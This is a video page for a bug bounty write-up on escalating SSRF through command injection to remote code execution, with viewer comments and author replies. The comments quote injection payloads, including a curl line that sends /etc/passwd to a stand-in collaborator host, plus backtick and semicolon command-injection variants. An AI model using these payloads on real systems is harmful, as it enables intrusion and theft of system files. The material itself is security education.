From a lame Server-Side Request Forgery to Remote Code Execution
ฝัง
- เผยแพร่เมื่อ 9 ส.ค. 2024
- Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server.
Read more on thehackerish.com/bug-bounty-w...
📙 Become a successful bug bounty hunter: thehackerish.com/a-bug-bounty...
🆓 Download your FREE Web hacking LAB and starting hacking NOW: thehackerish.com/owasp-top-10...
🌐 Read more on the blog: thehackerish.com
💪🏻 Support this work: thehackerish.com/how-to-support
- Facebook Page: / thehackerish
- Follow us on Twitter: / thehackerish
- Listen on Anchor: anchor.fm/thehackerish
- Listen on Spotify: open.spotify.com/show/4Ht8jEb...
- Listen on Google Podcasts: podcasts.google.com/?feed=aHR...
Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learn how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Besides, you learn how to gain a stable shell by leveraging the exposed SSH server. Finally, you learn that it's important to demonstrate a clear impact if you want to receive the highest bounty.
That's effin' diabolical mate. Great explanation! Really enjoying your channel.
Was simple, but never thought about it. Thanks for it!
Happy to help!
I love this Channel, he does very elegant, explicit demonstration, hope u post more videos on ssrf and xss
Thank you!
Marvelous explain 👍 keep doing, bro
Hi! Thanks for the awesome content.
great video. thank you very much for the content and the teaching
Thank you for your kind feedback, Enjoy!
Great video, thanks for sharing 👍
Thanks for the visit!
Super Amazing! Thankyou! :)
Enjoy!
Great explanation!!
Glad it was helpful!
Learn something new methodology thank for the amazing vedio 😍
My pleasure 😊
You are amazing man. Love yaa ❣️
great video! If you already have access to your target, do you also look for privilege escalation to receive more bounties or do you think your work is done after initial access?
Great question. I reported it and asked them if they want me to escalate my privileges, but they preferred to quickly fix it.
@@thehackerish thanks for the quick reply. Good idea to first ask for permission :)
@@thehackerish hey bro your work is good u help us learn but can you please show example of request and how you add command injection since i find it harder ot do you put commands then dot burpcollaborator without quotes to the burp addrress???
Great find! I've subscribed. The slide at 6:09 has "mycollab-server" twice. `curl -F ‘@/etc/passwd’ mycollab-server`.mycollab-server Do I understand correctly that you need to have it twice so that the .mycollab-server string at the end conforms it to what looks like a valid host name? If this is the case will your server receive two requests out of that one payload? and could the second "mycollab-server" just as well be example.com or anything else?
You have a sharp eye, Great question!
Since the content of passwd does not comply with a hostname name, the request will not be performed. However, the first one will exfiltrate the passwd to your server, which could be anything else as long as it is reachable from the internet.
If you want to receive the content in the subdomain part, you could base64 encode the file content, or a part of it.
@@thehackerish I get it! Thanks for your fast reply here almost a year after you posted it.
Great Finding ! congrats
Thanks!
Great
That's a great find.. learned something new today.✌️
Happy to hear that!
@@thehackerish example where do u put commands outside the the quotes of server address or??
This is stunning :o
were the payloads are shown in the video the used or you just wrote them for explaination ?? if none please share'em wih resources & thanks a lot
the injection was the same. Just replaced the long collaborator URL with a short one for visual purposes.
@@thehackerish wow, that's really cool, Thanks for your replies and the (very) awesome content :)
@@adamproof3440 My pleasure! Thanks for your kind comment!
Thank you brother. You and your channel is world best channel who teaches noobes from 0 2 h3r0. Love U Respect U Salute U 🤝❤💙💚💐👍
Oh! What a kind comment! I am humbled, Enjoy!!!
Great explaination...plz include screenshots for this type of content
It's meant to be a sleep story ;) Just kidding.
Wow Great Suff 👍👍
Thank you!
Hey nice video ! I'm wondering, if you have enter: 'domain.com; whoami' for the command injection part, it would've worked too right ? Or did they sanitize input weirdly ? Thks
I think it would work. Actually, I might have used it to chain multiple commands, I don't remember exactly though.
Really mindblowing ,owwssaaammmmm
Thank youuuu
really interesting video
Glad you liked it
Loved it..! thanks🤘
@@thehackerish what if the input accepts anything after prefix only? I mean if no it throws an error..any bypass for exfiltrating metadata? (#blindssrf)🙂
@@chaitanyacse3332 In this case you can still do `inject here`.collaborator.. since this story is basically a command injection.
@@thehackerish tried the same too but its not accepting `` these quotes. Any other bypasses 😉
Isn't this more similar to just plain command injection? I get that it was making requests to a server but SSRF usually accesses internal services eg a Redis database which I'm sure you could have done but injecting a command into what I assume is them running a curl command on the backend seems more similar to just plain old command injection. This isn't really a usual scenario that you would encounter.
Yeah I agree on the command injection point, but the first impression you get is that it is a SSRF. However, you'd be surprised how devs can be careless, especially with deadlines and complicated architectures, so I wouldn't rule this technique out of my daily tests :)
I d’ont understand why the server execute the command when you put ‘ in the url, it is standard ? Thx by advance
it's one of the ways to execute commands in Linux.
Best Hacker ...
SSTI - RCE tutorial :)
`command`.collaborator.url >>>> URL NOT VALID ERROR😒
Sir can you tell me how did you know that your command would work if you put it in subdomain part?
I didn't! Hacking is all trial and error, reflex from experience, and some luck as well :) Just keep reading blogs, and learning new things.
@@thehackerish can i know the name of the exploit im interested in reading about it
@@antimatter6728 You mean CVE? I haven't filed one. But it's a command injection / SSRF vulnerability.
So presumably, the host name you provided was run with a shell command - something like curl.
Why would they choose to do that instead of making the request within the program (like with Axios if they're using Node backend)
Good question! They were not using using any framework and the dev made the mistake of trusting the hostname during a ssh command.
Thank you so much bro ❤❤
My pleasure!
practical part for this vuln using your lab setup? wink-wink :D
;) ;)
Can you upload a practical video on it ???
When I have time, I can prepare a lab for it.
Thank you
Nice work
Note:
‘pwd’.mycollaborator-url
Will be needed to locate the users home folder 📁 path 🤔
As it was a service, that didn't show /home/xxx, but nice idea as well.
Brother you teaching is nice . But teach with some examples of site or with vulnerable site. we can understand clearly 🤝
Head over to the other playlists (web hacking training and live hacking sessions)
subbed.
Welcome to the club!
@@thehackerish thanks!
i dont understand how hackers can think payload like `command`.collaborator.url
we really need so much creativity to be a hacker?
think like a developer :) You can also build some software to get used to it!
@@thehackerish i dont know how to do that im completely lost the way
@@adtiyamuhammadakbar2711 there are many videos teaching how to build a web application :)
How much bounty you got for this?
It says it in the title. 4k
@@thehackerish sorry bro i don't focus that !
Please share how to use ACUNETIX results to exploit found vulnerabilities like SQLI XSS XSRF LFI RFI etc...bypassing WAF IDS IPS, Hash Recognition, Hash Cracking, Finding Hidden Admin Panels, bypassing admin panel or C-panels, Uploading Shell, Remote code execution-RCE, Rooting Web Server, Gain Root preveliage, Mass Defacement, Maintaining Back door, etc...
Would love to, but I am not familiar with acunetix scanner. It should be similar to BurpSuite Pro I guess.
@@thehackerish Yes exactly...no problem at all brother...teach us with any available tool script as per your convenience...you are excellent but I am very week in website hacking n website bug bounty hunting field as most of TH-cam videos are just basic...not practical n easy to understand....You are the best teacher...May God bless you for your efforts and help 🤝❤💙💚🌹💐👍
`hi`
Want to be ethical hacker then enrooll thehackerish❤️
Thank you!